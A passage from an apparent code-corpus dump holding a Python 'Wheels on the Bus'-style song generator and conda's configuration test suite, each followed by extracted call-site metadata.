115): '"""Model files (*.bmd *.bdl)"""'}, {}), "(None, 'Open File', '', 'Model files (*.bmd *.bdl)')", False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((109, 18, 109, 64), 'animations.general_animation.export_anim', 'j3d.export_anim', ({(109, 34, 109, 42): 'filepath', (109, 44, 109, 48): 'info', (109, 50, 109, 63): 'self.bmd_file'}, {}), '(filepath, info, self.bmd_file)', True, 'import animations.general_animation as j3d\n'), ((114, 20, 114, 41), 'PyQt5.QtWidgets.QTreeWidgetItem', 'QTreeWidgetItem', ({(114, 36, 114, 40): 'self'}, {}), '(self)', False, 'from PyQt5.QtWidgets import QAction, QTreeWidget, QTreeWidgetItem, QFileDialog\n'), ((36, 28, 36, 35), 'PyQt5.QtGui.QIcon', 'QIcon', ({}, {}), '()', False, 'from PyQt5.QtGui import QIcon\n'), ((77, 18, 77, 51), 'animations.general_animation.sort_filepath', 'j3d.sort_filepath', ({(77, 36, 77, 44): 'filepath', (77, 46, 77, 50): 'info'}, {}), '(filepath, info)', True, 'import animations.general_animation as j3d\n'), ((94, 18, 94, 55), 'animations.general_animation.convert_to_a', 'j3d.convert_to_a', ({(94, 35, 94, 48): 'self.filepath', (94, 50, 94, 54): 'info'}, {}), '(self.filepath, info)', True, 'import animations.general_animation as j3d\n'), ((107, 22, 107, 63), 'animations.general_animation.export_anim', 'j3d.export_anim', ({(107, 38, 107, 46): 'filepath', (107, 48, 107, 52): 'info', (107, 54, 107, 62): 'bmd_file'}, {}), '(filepath, info, bmd_file)', True, 'import animations.general_animation as j3d\n'), ((63, 26, 63, 42), 'widgets.yaz0.compress_fast', 'compress_fast', ({(63, 40, 63, 41): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n'), ((65, 26, 65, 37), 'widgets.yaz0.compress', 'compress', ({(65, 35, 65, 36): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n'), ((67, 26, 67, 42), 'widgets.yaz0.compress_slow', 'compress_slow', ({(67, 40, 67, 41): 'f'}, {}), '(f)', False, 'from widgets.yaz0 import compress, compress_slow, compress_fast\n')]
edhosken/WheelsSong
Wheels.py
cb988c8510a1095eeec3a2399b0fc0ba24bfa648
#Create the pre-defined song values and empty variables...Correct names not used so each starting letter would be unique numbers = (1 ,2 ,3 ,4 ,5 ,6 ,7 ,8 ,9 ,10 ,11 ,12 ,13 ,14 ,15 ,16 ,17 ,18 ) letters = ['a ','b ','c ','d ','e ','f ','g ','h ','i ','j ','k ','l ','m ','n ','o ','p ','q ','r '] roman = ['I ', 'II ', 'III ', 'IV ', 'V ', 'VI ', 'VII ', 'VIII ', 'IX ', 'X ', 'XI ', 'XII ', 'XIII ', 'XIV ', 'XV ', 'XVI ', 'XVII ', 'XVIII'] military = ['alpha ', 'bravo ', 'charlie ', 'delta ', 'echo ', 'foxtrot ', 'golf ', 'hotel ', 'india ', 'juliet ', 'kilo ', 'lima ', 'mike ', 'november ', 'oscar ', 'papa ', 'quebec ', 'romeo '] german = ['eins', 'zwei', 'drei', 'vier', 'fünf', 'sechs', 'sieben', 'acht', 'neun', 'zehn', 'elf', 'zwölf', 'dreizehn', 'vierzehn', 'fünfzehn', 'sechzehn', 'siebzehn', 'achtzehn'] pi = ['3 ','point ','1 ','4 ','1 ','5 ','9 ','2 ','6 ','5 ','3 ','5 ','8 ','9 ','7 ','9 ','3 ','2 '] ##Build morse code sequences t = 'dot' s = 'dash' m1 = t, s, s, s, s m2 = t, t, s, s, s m3 = t, t, t, s, s m4 = t, t, t, t, s m5 = t, t, t, t, t m6 = s, t, t, t, t m7 = s, s, t, t, t m8 = s, s, s, t, t m9 = s, s, s, s, t m0 = s, s, s, s, s code = [m1, m2, m3, m4, m5, m6, m7, m8, m9, m1 + m0, m1 + m1, m1 + m2, m1 + m3, m1 + m4, m1 + m5, m1 + m6, m1 + m7, m1 + m8] ##Other ideas: piglatin, japanese, spanish, prime, tau, e, ... ##NEED TO ADD INVALID ENTRY CATCHES print("Hello, let's sing a song that everybody loves!\n") sing = 'y' while sing == 'y': user = [] variation = input ("Please input what variation you wish to perform be entering 'numbers', 'letters', 'roman', 'military', 'pi', 'german', 'code', or 'user' to make your own song: \n").lower().strip() ##Seeming silly switching of strings to list types if variation == "numbers" or variation == "n": variation = numbers elif variation == "letters" or variation == "l": variation = letters elif variation == "roman" or variation == "r": variation = roman elif variation == "military" or variation == "m": variation = military elif variation == "pi" or variation == "p": variation = pi elif variation == "german" or variation == "g": variation = german elif variation == "code" or variation == "c": variation = code elif variation == "user" or variation == "u": while len(user) < 18: user.append(input ("Enter a word: ")) #User input to select the song pattern pattern = input ("\nNow please tell me what pattern to use by entering 'forward', 'backward', 'even', or 'odd':\n") print ("\nHere we go: \n\n") #Asemble the song...IMPROVE FORMAT SO OUTPUT IS EASIER TO READ song1 = "Oh, there are " song2 = " wheels on a big rig truck!" a = song1, variation[::], song2 b = song1, variation[::-1], song2 c = song1, variation[::2], song2 d = song1, variation[1::2], song2 ##Use pattern.startswith()?...Also, might be better to seperate forward/backward and even/odd choices. if pattern == 'forward' or pattern == 'f': print (a) elif pattern == 'backward' or pattern == 'b': print (b) elif pattern == 'odd' or pattern == 'o': print (c) elif pattern == 'even' or pattern == 'e': print (d) sing = input('\n\nWould you like to sing it again? (y/n) ').lower() ## This is the end of the while loop else: print ("\nOK, Goodbye!")
[]
dfroger/conda
tests/test_config.py
c0f99ff46b217d081501e66f4dcd7bcdb5d9c6aa
# (c) 2012-2014 Continuum Analytics, Inc. / http://continuum.io # All Rights Reserved # # conda is distributed under the terms of the BSD 3-clause license. # Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause. import os from os.path import dirname, join, exists import unittest import pytest import conda.config as config from conda.utils import get_yaml from conda.compat import iterkeys from tests.helpers import run_conda_command yaml = get_yaml() # use condarc from source tree to run these tests against config.rc_path = join(dirname(__file__), 'condarc') def _get_default_urls(): return ['http://repo.continuum.io/pkgs/free', 'http://repo.continuum.io/pkgs/pro'] config.get_default_urls = _get_default_urls # unset CIO_TEST. This is a Continuum-internal variable that draws packages from an internal server instead of # repo.continuum.io try: del os.environ['CIO_TEST'] except KeyError: pass class TestConfig(unittest.TestCase): # These tests are mostly to ensure API stability def __init__(self, *args, **kwargs): config.rc = config.load_condarc(config.rc_path) # Otherwise normalization tests will fail if the user is logged into # binstar. config.rc['add_binstar_token'] = False super(TestConfig, self).__init__(*args, **kwargs) def test_globals(self): self.assertTrue(config.root_dir) self.assertTrue(config.pkgs_dirs) self.assertTrue(config.envs_dirs) self.assertTrue(config.default_prefix) self.assertTrue(config.platform) self.assertTrue(config.subdir) self.assertTrue(config.arch_name) self.assertTrue(config.bits in (32, 64)) def test_pkgs_dir_from_envs_dir(self): root_dir = config.root_dir root_pkgs = join(root_dir, 'pkgs') for pi, po in [ (join(root_dir, 'envs'), root_pkgs), ('/usr/local/foo/envs' if config.platform != 'win' else 'C:\envs', '/usr/local/foo/envs/.pkgs' if config.platform != 'win' else 'C:\envs\.pkgs'), ]: self.assertEqual(config.pkgs_dir_from_envs_dir(pi), po) def test_proxy_settings(self): self.assertEqual(config.get_proxy_servers(), {'http': 'http://user:[email protected]:8080', 'https': 'https://user:[email protected]:8080'}) def test_normalize_urls(self): current_platform = config.subdir assert config.DEFAULT_CHANNEL_ALIAS == 'https://conda.anaconda.org/' assert config.rc.get('channel_alias') == 'https://your.repo/' for channel in iterkeys(config.normalize_urls(['defaults', 'system', 'https://anaconda.org/username', 'file:///Users/username/repo', 'username'])): assert (channel.endswith('/%s/' % current_platform) or channel.endswith('/noarch/')) self.assertEqual(config.normalize_urls([ 'defaults', 'system', 'https://conda.anaconda.org/username', 'file:///Users/username/repo', 'username' ], 'osx-64'), {'file:///Users/username/repo/noarch/': ('file:///Users/username/repo', 6), 'file:///Users/username/repo/osx-64/': ('file:///Users/username/repo', 6), 'http://repo.continuum.io/pkgs/free/noarch/': (None, 1), 'http://repo.continuum.io/pkgs/free/osx-64/': (None, 1), 'http://repo.continuum.io/pkgs/pro/noarch/': (None, 1), 'http://repo.continuum.io/pkgs/pro/osx-64/': (None, 1), 'http://some.custom/channel/noarch/': ('http://some.custom/channel', 3), 'http://some.custom/channel/osx-64/': ('http://some.custom/channel', 3), 'https://conda.anaconda.org/username/noarch/': ('https://conda.anaconda.org/username', 5), 'https://conda.anaconda.org/username/osx-64/': ('https://conda.anaconda.org/username', 5), 'https://your.repo/binstar_username/noarch/': ('binstar_username', 2), 'https://your.repo/binstar_username/osx-64/': ('binstar_username', 2), 'https://your.repo/username/noarch/': ('username', 7), 'https://your.repo/username/osx-64/': ('username', 7)}) test_condarc = os.path.join(os.path.dirname(__file__), 'test_condarc') def _read_test_condarc(): with open(test_condarc) as f: return f.read() # Tests for the conda config command # FIXME This shoiuld be multiple individual tests @pytest.mark.slow def test_config_command_basics(): try: # Test that creating the file adds the defaults channel assert not os.path.exists('test_condarc') stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - test - defaults """ os.unlink(test_condarc) # When defaults is explicitly given, it should not be added stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test', '--add', 'channels', 'defaults') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - defaults - test """ os.unlink(test_condarc) # Duplicate keys should not be added twice stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == stderr == '' stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == '' assert stderr == "Skipping channels: test, item already exists" assert _read_test_condarc() == """\ channels: - test - defaults """ os.unlink(test_condarc) # Test creating a new file with --set stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'true') assert stdout == stderr == '' assert _read_test_condarc() == """\ always_yes: true """ os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_get(): try: # Test --get with open(test_condarc, 'w') as f: f.write("""\ channels: - test - defaults create_default_packages: - ipython - numpy changeps1: no always_yes: true invalid_key: yes channel_alias: http://alpha.conda.anaconda.org """) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get') assert stdout == """\ --set always_yes True --set changeps1 no --set channel_alias http://alpha.conda.anaconda.org --add channels 'defaults' --add channels 'test' --add create_default_packages 'numpy' --add create_default_packages 'ipython'\ """ assert stderr == "unknown key invalid_key" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'channels') assert stdout == """\ --add channels 'defaults' --add channels 'test'\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'changeps1') assert stdout == """\ --set changeps1 no\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'changeps1', 'channels') assert stdout == """\ --set changeps1 no --add channels 'defaults' --add channels 'test'\ """ assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'allow_softlinks') assert stdout == "" assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'track_features') assert stdout == "" assert stderr == "" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'invalid_key') assert stdout == "" assert "invalid choice: 'invalid_key'" in stderr stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get', 'not_valid_key') assert stdout == "" assert "invalid choice: 'not_valid_key'" in stderr os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_parser(): try: # Now test the YAML "parser" # Channels is normal content. # create_default_packages has extra spaces in list items condarc = """\ channels: - test - defaults create_default_packages : - ipython - numpy changeps1: false # Here is a comment always_yes: yes """ # First verify that this itself is valid YAML assert yaml.load(condarc, Loader=yaml.RoundTripLoader) == {'channels': ['test', 'defaults'], 'create_default_packages': ['ipython', 'numpy'], 'changeps1': False, 'always_yes': 'yes'} with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get') assert stdout == """\ --set always_yes yes --set changeps1 False --add channels 'defaults' --add channels 'test' --add create_default_packages 'numpy' --add create_default_packages 'ipython'\ """ stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'mychannel') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - mychannel - test - defaults create_default_packages: - ipython - numpy changeps1: false # Here is a comment always_yes: 'yes' """ stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'changeps1', 'true') assert stdout == stderr == '' assert _read_test_condarc() == """\ channels: - mychannel - test - defaults create_default_packages: - ipython - numpy changeps1: true # Here is a comment always_yes: 'yes' """ os.unlink(test_condarc) # Test adding a new list key. We couldn't test this above because it # doesn't work yet with odd whitespace condarc = """\ channels: - test - defaults always_yes: true """ with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'disallow', 'perl') assert stdout == stderr == '' assert _read_test_condarc() == condarc + """\ disallow: - perl """ os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_remove_force(): try: # Finally, test --remove, --remove-key run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'true') stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'channels', 'test') assert stdout == stderr == '' assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults'], 'always_yes': True} stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'channels', 'test', '--force') assert stdout == '' assert stderr == "Error: 'test' is not in the 'channels' key of the config file" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove', 'disallow', 'python', '--force') assert stdout == '' assert stderr == "Error: key 'disallow' is not in the config file" stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove-key', 'always_yes', '--force') assert stdout == stderr == '' assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults']} stdout, stderr = run_conda_command('config', '--file', test_condarc, '--remove-key', 'always_yes', '--force') assert stdout == '' assert stderr == "Error: key 'always_yes' is not in the config file" os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass # FIXME Break into multiple tests @pytest.mark.slow def test_config_command_bad_args(): try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'notarealkey', 'test') assert stdout == '' assert not exists(test_condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'notarealkey', 'yes') assert stdout == '' assert not exists(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass def test_invalid_rc(): # Some tests for unexpected input in the condarc, like keys that are the # wrong type try: condarc = """\ channels: """ with open(test_condarc, 'w') as f: f.write(condarc) stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add', 'channels', 'test') assert stdout == '' assert stderr == """\ Error: Could not parse the yaml file. Use -f to use the yaml parser (this will remove any structure or comments from the existing .condarc file). Reason: key 'channels' should be a list, not NoneType.""" assert _read_test_condarc() == condarc os.unlink(test_condarc) finally: try: pass os.unlink(test_condarc) except OSError: pass def test_config_set(): # Test the config set command # Make sure it accepts only boolean values for boolean keys and any value for string keys try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'always_yes', 'yep') assert stdout == '' assert stderr == 'Error: Key: always_yes; yep is not a YAML boolean.' finally: try: os.unlink(test_condarc) except OSError: pass def test_set_rc_string(): # Test setting string keys in .condarc # We specifically test ssl_verify since it can be either a boolean or a string try: stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'ssl_verify', 'yes') assert stdout == '' assert stderr == '' verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify'] assert verify == 'yes' stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set', 'ssl_verify', 'test_string.crt') assert stdout == '' assert stderr == '' verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify'] assert verify == 'test_string.crt' os.unlink(test_condarc) finally: try: os.unlink(test_condarc) except OSError: pass
[((18, 7, 18, 17), 'conda.utils.get_yaml', 'get_yaml', ({}, {}), '()', False, 'from conda.utils import get_yaml\n'), ((21, 22, 21, 39), 'os.path.dirname', 'dirname', ({(21, 30, 21, 38): '__file__'}, {}), '(__file__)', False, 'from os.path import dirname, join, exists\n'), ((102, 28, 102, 53), 'os.path.dirname', 'os.path.dirname', ({(102, 44, 102, 52): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((41, 20, 41, 55), 'conda.config.load_condarc', 'config.load_condarc', ({(41, 40, 41, 54): 'config.rc_path'}, {}), '(config.rc_path)', True, 'import conda.config as config\n'), ((59, 20, 59, 42), 'os.path.join', 'join', ({(59, 25, 59, 33): 'root_dir', (59, 35, 59, 41): '"""pkgs"""'}, {}), "(root_dir, 'pkgs')", False, 'from os.path import dirname, join, exists\n'), ((115, 25, 116, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(115, 43, 115, 51): '"""config"""', (115, 53, 115, 61): '"""--file"""', (115, 63, 115, 75): 'test_condarc', (115, 77, 115, 84): '"""--add"""', (116, 12, 116, 22): '"""channels"""', (116, 24, 116, 30): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((123, 8, 123, 31), 'os.unlink', 'os.unlink', ({(123, 18, 123, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((126, 25, 127, 56), 'tests.helpers.run_conda_command', 'run_conda_command', ({(126, 43, 126, 51): '"""config"""', (126, 53, 126, 61): '"""--file"""', (126, 63, 126, 75): 'test_condarc', (126, 77, 126, 84): '"""--add"""', (127, 4, 127, 14): '"""channels"""', (127, 16, 127, 22): '"""test"""', (127, 24, 127, 31): '"""--add"""', (127, 33, 127, 43): '"""channels"""', (127, 45, 127, 55): '"""defaults"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'test', '--add', 'channels', 'defaults')", False, 'from tests.helpers import run_conda_command\n'), ((134, 8, 134, 31), 'os.unlink', 'os.unlink', ({(134, 18, 134, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((137, 25, 138, 27), 'tests.helpers.run_conda_command', 'run_conda_command', ({(137, 43, 137, 51): '"""config"""', (137, 53, 137, 61): '"""--file"""', (137, 63, 137, 75): 'test_condarc', (137, 77, 137, 84): '"""--add"""', (138, 8, 138, 18): '"""channels"""', (138, 20, 138, 26): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((140, 25, 141, 27), 'tests.helpers.run_conda_command', 'run_conda_command', ({(140, 43, 140, 51): '"""config"""', (140, 53, 140, 61): '"""--file"""', (140, 63, 140, 75): 'test_condarc', (140, 77, 140, 84): '"""--add"""', (141, 8, 141, 18): '"""channels"""', (141, 20, 141, 26): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((149, 8, 149, 31), 'os.unlink', 'os.unlink', ({(149, 18, 149, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((152, 25, 153, 38), 'tests.helpers.run_conda_command', 'run_conda_command', ({(152, 43, 152, 51): '"""config"""', (152, 53, 152, 61): '"""--file"""', (152, 63, 152, 75): 'test_condarc', (153, 8, 153, 15): '"""--set"""', (153, 17, 153, 29): '"""always_yes"""', (153, 31, 153, 37): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((158, 8, 158, 31), 'os.unlink', 'os.unlink', ({(158, 18, 158, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((192, 25, 192, 85), 'tests.helpers.run_conda_command', 'run_conda_command', ({(192, 43, 192, 51): '"""config"""', (192, 53, 192, 61): '"""--file"""', (192, 63, 192, 75): 'test_condarc', (192, 77, 192, 84): '"""--get"""'}, {}), "('config', '--file', test_condarc, '--get')", False, 'from tests.helpers import run_conda_command\n'), ((204, 25, 205, 28), 'tests.helpers.run_conda_command', 'run_conda_command', ({(204, 43, 204, 51): '"""config"""', (204, 53, 204, 61): '"""--file"""', (204, 63, 204, 75): 'test_condarc', (205, 8, 205, 15): '"""--get"""', (205, 17, 205, 27): '"""channels"""'}, {}), "('config', '--file', test_condarc, '--get', 'channels')", False, 'from tests.helpers import run_conda_command\n'), ((213, 25, 214, 29), 'tests.helpers.run_conda_command', 'run_conda_command', ({(213, 43, 213, 51): '"""config"""', (213, 53, 213, 61): '"""--file"""', (213, 63, 213, 75): 'test_condarc', (214, 8, 214, 15): '"""--get"""', (214, 17, 214, 28): '"""changeps1"""'}, {}), "('config', '--file', test_condarc, '--get', 'changeps1')", False, 'from tests.helpers import run_conda_command\n'), ((221, 25, 222, 45), 'tests.helpers.run_conda_command', 'run_conda_command', ({(221, 43, 221, 51): '"""config"""', (221, 53, 221, 61): '"""--file"""', (221, 63, 221, 75): 'test_condarc', (222, 12, 222, 19): '"""--get"""', (222, 21, 222, 32): '"""changeps1"""', (222, 34, 222, 44): '"""channels"""'}, {}), "('config', '--file', test_condarc, '--get', 'changeps1',\n 'channels')", False, 'from tests.helpers import run_conda_command\n'), ((231, 25, 232, 35), 'tests.helpers.run_conda_command', 'run_conda_command', ({(231, 43, 231, 51): '"""config"""', (231, 53, 231, 61): '"""--file"""', (231, 63, 231, 75): 'test_condarc', (232, 8, 232, 15): '"""--get"""', (232, 17, 232, 34): '"""allow_softlinks"""'}, {}), "('config', '--file', test_condarc, '--get', 'allow_softlinks')", False, 'from tests.helpers import run_conda_command\n'), ((237, 25, 238, 34), 'tests.helpers.run_conda_command', 'run_conda_command', ({(237, 43, 237, 51): '"""config"""', (237, 53, 237, 61): '"""--file"""', (237, 63, 237, 75): 'test_condarc', (238, 8, 238, 15): '"""--get"""', (238, 17, 238, 33): '"""track_features"""'}, {}), "('config', '--file', test_condarc, '--get', 'track_features')", False, 'from tests.helpers import run_conda_command\n'), ((243, 25, 244, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(243, 43, 243, 51): '"""config"""', (243, 53, 243, 61): '"""--file"""', (243, 63, 243, 75): 'test_condarc', (244, 8, 244, 15): '"""--get"""', (244, 17, 244, 30): '"""invalid_key"""'}, {}), "('config', '--file', test_condarc, '--get', 'invalid_key')", False, 'from tests.helpers import run_conda_command\n'), ((249, 25, 250, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(249, 43, 249, 51): '"""config"""', (249, 53, 249, 61): '"""--file"""', (249, 63, 249, 75): 'test_condarc', (250, 8, 250, 15): '"""--get"""', (250, 17, 250, 32): '"""not_valid_key"""'}, {}), "('config', '--file', test_condarc, '--get', 'not_valid_key')", False, 'from tests.helpers import run_conda_command\n'), ((255, 8, 255, 31), 'os.unlink', 'os.unlink', ({(255, 18, 255, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((295, 25, 295, 85), 'tests.helpers.run_conda_command', 'run_conda_command', ({(295, 43, 295, 51): '"""config"""', (295, 53, 295, 61): '"""--file"""', (295, 63, 295, 75): 'test_condarc', (295, 77, 295, 84): '"""--get"""'}, {}), "('config', '--file', test_condarc, '--get')", False, 'from tests.helpers import run_conda_command\n'), ((306, 25, 307, 36), 'tests.helpers.run_conda_command', 'run_conda_command', ({(306, 43, 306, 51): '"""config"""', (306, 53, 306, 61): '"""--file"""', (306, 63, 306, 75): 'test_condarc', (306, 77, 306, 84): '"""--add"""', (307, 12, 307, 22): '"""channels"""', (307, 24, 307, 35): '"""mychannel"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'mychannel')", False, 'from tests.helpers import run_conda_command\n'), ((326, 25, 327, 41), 'tests.helpers.run_conda_command', 'run_conda_command', ({(326, 43, 326, 51): '"""config"""', (326, 53, 326, 61): '"""--file"""', (326, 63, 326, 75): 'test_condarc', (327, 12, 327, 19): '"""--set"""', (327, 21, 327, 32): '"""changeps1"""', (327, 34, 327, 40): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'changeps1',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((347, 8, 347, 31), 'os.unlink', 'os.unlink', ({(347, 18, 347, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((362, 25, 363, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(362, 43, 362, 51): '"""config"""', (362, 53, 362, 61): '"""--file"""', (362, 63, 362, 75): 'test_condarc', (362, 77, 362, 84): '"""--add"""', (363, 12, 363, 22): '"""disallow"""', (363, 24, 363, 30): '"""perl"""'}, {}), "('config', '--file', test_condarc, '--add', 'disallow', 'perl'\n )", False, 'from tests.helpers import run_conda_command\n'), ((369, 8, 369, 31), 'os.unlink', 'os.unlink', ({(369, 18, 369, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((385, 8, 386, 31), 'tests.helpers.run_conda_command', 'run_conda_command', ({(385, 26, 385, 34): '"""config"""', (385, 36, 385, 44): '"""--file"""', (385, 46, 385, 58): 'test_condarc', (385, 60, 385, 67): '"""--add"""', (386, 12, 386, 22): '"""channels"""', (386, 24, 386, 30): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )", False, 'from tests.helpers import run_conda_command\n'), ((387, 8, 388, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(387, 26, 387, 34): '"""config"""', (387, 36, 387, 44): '"""--file"""', (387, 46, 387, 58): 'test_condarc', (387, 60, 387, 67): '"""--set"""', (388, 12, 388, 24): '"""always_yes"""', (388, 26, 388, 32): '"""true"""'}, {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')", False, 'from tests.helpers import run_conda_command\n'), ((389, 25, 390, 43), 'tests.helpers.run_conda_command', 'run_conda_command', ({(389, 43, 389, 51): '"""config"""', (389, 53, 389, 61): '"""--file"""', (389, 63, 389, 75): 'test_condarc', (390, 12, 390, 22): '"""--remove"""', (390, 24, 390, 34): '"""channels"""', (390, 36, 390, 42): '"""test"""'}, {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test')", False, 'from tests.helpers import run_conda_command\n'), ((395, 25, 396, 54), 'tests.helpers.run_conda_command', 'run_conda_command', ({(395, 43, 395, 51): '"""config"""', (395, 53, 395, 61): '"""--file"""', (395, 63, 395, 75): 'test_condarc', (396, 12, 396, 22): '"""--remove"""', (396, 24, 396, 34): '"""channels"""', (396, 36, 396, 42): '"""test"""', (396, 44, 396, 53): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((400, 25, 401, 56), 'tests.helpers.run_conda_command', 'run_conda_command', ({(400, 43, 400, 51): '"""config"""', (400, 53, 400, 61): '"""--file"""', (400, 63, 400, 75): 'test_condarc', (401, 12, 401, 22): '"""--remove"""', (401, 24, 401, 34): '"""disallow"""', (401, 36, 401, 44): '"""python"""', (401, 46, 401, 55): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove', 'disallow',\n 'python', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((405, 25, 406, 52), 'tests.helpers.run_conda_command', 'run_conda_command', ({(405, 43, 405, 51): '"""config"""', (405, 53, 405, 61): '"""--file"""', (405, 63, 405, 75): 'test_condarc', (406, 12, 406, 26): '"""--remove-key"""', (406, 28, 406, 40): '"""always_yes"""', (406, 42, 406, 51): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((410, 25, 411, 52), 'tests.helpers.run_conda_command', 'run_conda_command', ({(410, 43, 410, 51): '"""config"""', (410, 53, 410, 61): '"""--file"""', (410, 63, 410, 75): 'test_condarc', (411, 12, 411, 26): '"""--remove-key"""', (411, 28, 411, 40): '"""always_yes"""', (411, 42, 411, 51): '"""--force"""'}, {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')", False, 'from tests.helpers import run_conda_command\n'), ((415, 8, 415, 31), 'os.unlink', 'os.unlink', ({(415, 18, 415, 30): 'test_condarc'}, {}), '(test_condarc)', False, 'import os\n'), ((429, 25, 430, 34), 'tests.helpers.run_conda_command', 'run_conda_command', ({(429, 43, 429, 51): '"""config"""', (429, 53, 429, 61): '"""--file"""', (429, 63, 429, 75): 'test_condarc', (429, 77, 429, 84): '"""--add"""', (430, 12, 430, 25): '"""notarealkey"""', (430, 27, 430, 33): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'notarealkey',\n 'test')", False, 'from tests.helpers import run_conda_command\n'), ((435, 25, 436, 33), 'tests.helpers.run_conda_command', 'run_conda_command', ({(435, 43, 435, 51): '"""config"""', (435, 53, 435, 61): '"""--file"""', (435, 63, 435, 75): 'test_condarc', (435, 77, 435, 84): '"""--set"""', (436, 12, 436, 25): '"""notarealkey"""', (436, 27, 436, 32): '"""yes"""'}, {}), "('config', '--file', test_condarc, '--set', 'notarealkey',\n 'yes')", False, 'from tests.helpers import run_conda_command\n'), ((459, 25, 460, 71), 'tests.helpers.run_conda_command', 'run_conda_command', ({(459, 43, 459, 51): '"""config"""', (459, 53, 459, 61): '"""--file"""', (459, 63, 459, 75): 'test_condarc', (460, 43, 460, 50): '"""--add"""', (460, 52, 460, 62): '"""channels"""', (460, 64, 460, 70): '"""test"""'}, {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n 